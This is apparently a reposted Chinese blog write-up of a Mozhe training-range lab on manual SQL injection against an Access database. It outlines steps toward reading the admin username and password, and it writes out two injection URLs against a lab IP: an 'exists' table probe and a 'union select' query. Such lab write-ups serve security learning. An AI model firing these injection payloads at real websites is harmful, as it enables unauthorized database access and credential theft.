04#墨者靶场-SQL手工注入漏洞测试(Access数据库)

                                                              墨者靶场4

                                                             By/shy014

  1. 确定列数,为4列

  1. 确定存在admin表

http://219.153.49.228:47368/new_list.asp?id=1 and exists (select * from admin)

  1. 确定回显位置

http://219.153.49.228:47368/new_list.asp?id=1 union select 1,2,3,4 from admin

  1. 确定存在username字段和passwd字段

 

  1. 读取用户和密码

  1. 解密并提交key

发布了41 篇原创文章 · 获赞 5 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/103080409